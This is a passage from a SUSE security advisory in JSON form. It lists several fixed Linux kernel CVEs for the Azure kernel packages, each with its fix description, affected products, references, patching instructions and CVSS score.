NBD_CFLAG_DESTROY_ON_DISCONNECT):\n connect // nbd_refs=1 (trigger recv_work)\n open nbd // nbd_refs=2\n NBD_CLEAR_SOCK\n close nbd\n nbd_release\n nbd_disconnect_and_put\n flush_workqueue // recv_work done\n nbd_config_put\n nbd_put // nbd_refs=1\n nbd_put // nbd_refs=0\n queue_work\n\npath B (netlink without NBD_CFLAG_DESTROY_ON_DISCONNECT):\n connect // nbd_refs=2 (trigger recv_work)\n open nbd // nbd_refs=3\n NBD_CLEAR_SOCK // conf_refs=2\n close nbd\n nbd_release\n nbd_config_put // conf_refs=1\n nbd_put // nbd_refs=2\n recv_work done // conf_refs=0, nbd_refs=1\n rmmod // nbd_refs=0\n\nDepends-on: e2daec488c57 (\"nbd: Fix hungtask when nbd_config_put\")",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68372",
"url": "https://www.suse.com/security/cve/CVE-2025-68372"
},
{
"category": "external",
"summary": "SUSE Bug 1255537 for CVE-2025-68372",
"url": "https://bugzilla.suse.com/1255537"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68372"
},
{
"cve": "CVE-2025-68379",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68379"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/rxe: Fix null deref on srq-\u003erq.queue after resize failure\n\nA NULL pointer dereference can occur in rxe_srq_chk_attr() when\nibv_modify_srq() is invoked twice in succession under certain error\nconditions. The first call may fail in rxe_queue_resize(), which leads\nrxe_srq_from_attr() to set srq-\u003erq.queue = NULL. The second call then\ntriggers a crash (null deref) when accessing\nsrq-\u003erq.queue-\u003ebuf-\u003eindex_mask.\n\nCall Trace:\n\u003cTASK\u003e\nrxe_modify_srq+0x170/0x480 [rdma_rxe]\n? __pfx_rxe_modify_srq+0x10/0x10 [rdma_rxe]\n? uverbs_try_lock_object+0x4f/0xa0 [ib_uverbs]\n? rdma_lookup_get_uobject+0x1f0/0x380 [ib_uverbs]\nib_uverbs_modify_srq+0x204/0x290 [ib_uverbs]\n? __pfx_ib_uverbs_modify_srq+0x10/0x10 [ib_uverbs]\n? tryinc_node_nr_active+0xe6/0x150\n? uverbs_fill_udata+0xed/0x4f0 [ib_uverbs]\nib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x2c0/0x470 [ib_uverbs]\n? __pfx_ib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x10/0x10 [ib_uverbs]\n? uverbs_fill_udata+0xed/0x4f0 [ib_uverbs]\nib_uverbs_run_method+0x55a/0x6e0 [ib_uverbs]\n? __pfx_ib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x10/0x10 [ib_uverbs]\nib_uverbs_cmd_verbs+0x54d/0x800 [ib_uverbs]\n? __pfx_ib_uverbs_cmd_verbs+0x10/0x10 [ib_uverbs]\n? __pfx___raw_spin_lock_irqsave+0x10/0x10\n? __pfx_do_vfs_ioctl+0x10/0x10\n? ioctl_has_perm.constprop.0.isra.0+0x2c7/0x4c0\n? __pfx_ioctl_has_perm.constprop.0.isra.0+0x10/0x10\nib_uverbs_ioctl+0x13e/0x220 [ib_uverbs]\n? __pfx_ib_uverbs_ioctl+0x10/0x10 [ib_uverbs]\n__x64_sys_ioctl+0x138/0x1c0\ndo_syscall_64+0x82/0x250\n? fdget_pos+0x58/0x4c0\n? ksys_write+0xf3/0x1c0\n? __pfx_ksys_write+0x10/0x10\n? do_syscall_64+0xc8/0x250\n? __pfx_vm_mmap_pgoff+0x10/0x10\n? fget+0x173/0x230\n? fput+0x2a/0x80\n? ksys_mmap_pgoff+0x224/0x4c0\n? do_syscall_64+0xc8/0x250\n? do_user_addr_fault+0x37b/0xfe0\n? clear_bhb_loop+0x50/0xa0\n? clear_bhb_loop+0x50/0xa0\n? clear_bhb_loop+0x50/0xa0\nentry_SYSCALL_64_after_hwframe+0x76/0x7e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68379",
"url": "https://www.suse.com/security/cve/CVE-2025-68379"
},
{
"category": "external",
"summary": "SUSE Bug 1255695 for CVE-2025-68379",
"url": "https://bugzilla.suse.com/1255695"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68379"
},
{
"cve": "CVE-2025-68725",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68725"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Do not let BPF test infra emit invalid GSO types to stack\n\nYinhao et al. reported that their fuzzer tool was able to trigger a\nskb_warn_bad_offload() from netif_skb_features() -\u003e gso_features_check().\nWhen a BPF program - triggered via BPF test infra - pushes the packet\nto the loopback device via bpf_clone_redirect() then mentioned offload\nwarning can be seen. GSO-related features are then rightfully disabled.\n\nWe get into this situation due to convert___skb_to_skb() setting\ngso_segs and gso_size but not gso_type. Technically, it makes sense\nthat this warning triggers since the GSO properties are malformed due\nto the gso_type. Potentially, the gso_type could be marked non-trustworthy\nthrough setting it at least to SKB_GSO_DODGY without any other specific\nassumptions, but that also feels wrong given we should not go further\ninto the GSO engine in the first place.\n\nThe checks were added in 121d57af308d (\"gso: validate gso_type in GSO\nhandlers\") because there were malicious (syzbot) senders that combine\na protocol with a non-matching gso_type. If we would want to drop such\npackets, gso_features_check() currently only returns feature flags via\nnetif_skb_features(), so one location for potentially dropping such skbs\ncould be validate_xmit_unreadable_skb(), but then otoh it would be\nan additional check in the fast-path for a very corner case. Given\nbpf_clone_redirect() is the only place where BPF test infra could emit\nsuch packets, lets reject them right there.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68725",
"url": "https://www.suse.com/security/cve/CVE-2025-68725"
},
{
"category": "external",
"summary": "SUSE Bug 1255569 for CVE-2025-68725",
"url": "https://bugzilla.suse.com/1255569"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68725"
},
{
"cve": "CVE-2025-68727",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68727"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nntfs3: Fix uninit buffer allocated by __getname()\n\nFix uninit errors caused after buffer allocation given to \u0027de\u0027; by\ninitializing the buffer with zeroes. The fix was found by using KMSAN.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68727",
"url": "https://www.suse.com/security/cve/CVE-2025-68727"
},
{
"category": "external",
"summary": "SUSE Bug 1255568 for CVE-2025-68727",
"url": "https://bugzilla.suse.com/1255568"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68727"
},
{
"cve": "CVE-2025-68728",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68728"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nntfs3: fix uninit memory after failed mi_read in mi_format_new\n\nFix a KMSAN un-init bug found by syzkaller.\n\nntfs_get_bh() expects a buffer from sb_getblk(), that buffer may not be\nuptodate. We do not bring the buffer uptodate before setting it as\nuptodate. If the buffer were to not be uptodate, it could mean adding a\nbuffer with un-init data to the mi record. Attempting to load that record\nwill trigger KMSAN.\n\nAvoid this by setting the buffer as uptodate, if it\u0027s not already, by\noverwriting it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68728",
"url": "https://www.suse.com/security/cve/CVE-2025-68728"
},
{
"category": "external",
"summary": "SUSE Bug 1255539 for CVE-2025-68728",
"url": "https://bugzilla.suse.com/1255539"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68728"
},
{
"cve": "CVE-2025-68733",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68733"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmack: fix bug: unprivileged task can create labels\n\nIf an unprivileged task is allowed to relabel itself\n(/smack/relabel-self is not empty),\nit can freely create new labels by writing their\nnames into own /proc/PID/attr/smack/current\n\nThis occurs because do_setattr() imports\nthe provided label in advance,\nbefore checking \"relabel-self\" list.\n\nThis change ensures that the \"relabel-self\" list\nis checked before importing the label.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68733",
"url": "https://www.suse.com/security/cve/CVE-2025-68733"
},
{
"category": "external",
"summary": "SUSE Bug 1255615 for CVE-2025-68733",
"url": "https://bugzilla.suse.com/1255615"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68733"
},
{
"cve": "CVE-2025-68764",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68764"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFS: Automounted filesystems should inherit ro,noexec,nodev,sync flags\n\nWhen a filesystem is being automounted, it needs to preserve the\nuser-set superblock mount options, such as the \"ro\" flag.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
